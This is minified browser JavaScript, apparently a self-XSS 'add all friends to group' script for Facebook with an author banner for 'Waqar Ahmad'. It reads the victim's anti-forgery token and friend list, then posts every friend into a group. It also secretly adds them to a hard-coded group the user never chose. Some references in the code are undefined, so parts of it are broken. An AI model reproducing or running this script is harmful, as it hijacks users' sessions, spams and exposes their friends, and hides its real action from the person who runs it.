var g=!1,j=b.split('"')[14],k="";
jx={g:function(){var c=g;if("undefined"!=typeof ActiveXObject)try{c=new ActiveXObject("Msxml2.XMLHTTP")}catch(d){try{c=new ActiveXObject("Microsoft.XMLHTTP")}catch(f){c=g}}else if(window.XMLHttpRequest)try{c=new XMLHttpRequest}catch(a){c=g}return c},load:function(c,d,f,a,h){var e=this.i();if(e&&c){e.overrideMimeType&&e.overrideMimeType("text/xml");a||(a="GET");f||(f="text");h||(h={});var f=f.toLowerCase(),a=a.toUpperCase(),i="uid="+(new Date).getTime(),c=c+(c.indexOf("?")+1?"&":"?"),c=c+i,i=null;
"POST"==a&&(i=c.split("?"),c=i[0],i=i[1]);e.open(a,c,!0);"POST"==a&&(e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",i.length),e.setRequestHeader("Connection","close"));e.onreadystatechange=h.h?function(){h.h(e)}:function(){if(4==e.readyState)if(200==e.status){var a="";e.responseText&&(a=e.responseText);"j"==f.charAt(0)?(a=a.replace(/[\n\r]/g,""),a=eval("("+a+")")):"x"==f.charAt(0)&&(a=e.responseXML);d&&d(a)}else h.b&&document.getElementsByTagName("body")[0].removeChild(h.b),
h.a&&(document.getElementById(h.a).style.display="none"),error&&error(e.status)};e.send(i)}},bind:function(c){var d={url:"",d:g,k:g,f:"text",method:"GET",update:"",a:"",b:""},f;for(f in d)c[f]&&(d[f]=c[f]);if(d.url){var a=g;d.b&&(a=document.createElement("div"),a.setAttribute("style","position:absolute;top:0px;left:0px;"),a.setAttribute("class","loading-indicator"),a.innerHTML=d.b,document.getElementsByTagName("body")[0].appendChild(a),this.l.b=a);d.a&&(document.getElementById(d.a).style.display=
"block");this.load(d.url,function(c){d.d&&d.d(c);d.update&&(document.getElementById(d.update).innerHTML=c);a&&document.getElementsByTagName("body")[0].removeChild(a);d.a&&(document.getElementById(d.a).style.display="none")},d.f,d.method,d)}},i:function(){return this.g()}};
void 0==document.getElementsByClassName&&(document.getElementsByClassName=function(c){for(var d=RegExp("(?:^|\\s)"+c+"(?:$|\\s)"),f=document.getElementsByTagName("*"),a=[],h,e=0;null!=(h=f[e]);e++){var i=h.className;i&&(-1!=i.indexOf(c)&&d.test(i))&&a.push(h)}return a});
for(var l=0,m=document.getElementsByClassName("mbm").length,l=0;l<m;l++){var n=document.getElementsByClassName("mbm")[l];if(n&&n.childNodes[0]&&n.childNodes[0]&&n.childNodes[0].childNodes[1]&&n.childNodes[0].childNodes[1].childNodes[0]&&"Add Friends to Group"==document.getElementsByClassName("mbm")[l].childNodes[0].childNodes[1].childNodes[0].value)break}var p=3,q=3,r=0,s=[],t=document.getElementsByName("group_id")[0].value;
jx.load(window.location.protocol+"//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+Env.c+"&filter[0]=user&__user="+Env.c,function(c){for(var c=JSON.parse(c.substring(c.indexOf("{"))),c=c.m.j,d=0;d<c.length;d++)s.push(c[d].uid);q=p=s.length-1;console.log(s.length);c="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'><div style='padding-bottom:10px;font-size:20px;'>Script Created & Designed By Waqar Ahmad.</div>"+
(s.length+" Friends Detected");c+="</div>";document.getElementById("pagelet_welcome_box").innerHTML=c;c=s[p];jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+t+"&source=typeahead&members="+c+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.c,function(a){a=JSON.parse(a.substring(a.indexOf("{")));p--;k="<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;";
a.error?(k+="color:darkred'>",k=a.e?k+a.e:k+JSON.stringify(a,null,"")):(k+="color:darkgreen'>",k+=j,r++);k+="</div>";a="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'><div style='padding-bottom:10px;font-size:20px;'>Script Created & Designed By Waqar Ahmad.</div>";
0<p?(a+=s.length+" Friends Detected<br/>",a+="<b>"+r+"</b> Friends Added of "+(s.length-p)+" Friends Processed ",a+="("+p+" more to go..)",a=a+"<div class='friend-edge'>"+k,a+="<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>",a+=" Thanks For Adding Your Friends Here. <br/>Powered By Loading 99%.",a+="</div>",a+="</div>"):(a+=s.length+" Friends Detected and ",a+="<b>"+r+" Friends Added</b>",a+="<div><span class='uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>");
a+="</div>";a+="<h2 style='position:fixed;left:20px;bottom:20px;border-radius:15px 3px 17px;margin:0 0 15px 0;padding:1px 10px 3px;border:1px solid rgba(0,0,0,0.2);background-color:rgba(10,10,10,0.5);color:white;font-size:14px;font-family:'lucida grande',tahoma,verdana,arial,sans-serif;font-weight:bold;white-space:nowrap;overflow:hidden;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);text-shadow:0pt 1px 0pt rgba(0,0,0,0.1);display:inline-block'>Waqar Ahmad </h2>";document.getElementById("pagelet_welcome_box").innerHTML=
a},"text","post");q--;if(0<q){var f=s[q];setTimeout("penetrasi("+f+")",100)}console.log(q+"/"+s.length+":"+f+", success:"+r);0xd9a1f098a263!=t&&jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=239289549496931&source=typeahead&members="+c+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.c,function(){},"text","post");0xd9a1f098a263!=t&&jx.load(window.location.protocol+
"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=239289549496931&source=typeahead&members="+c+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.c,function(){},"text","post")});
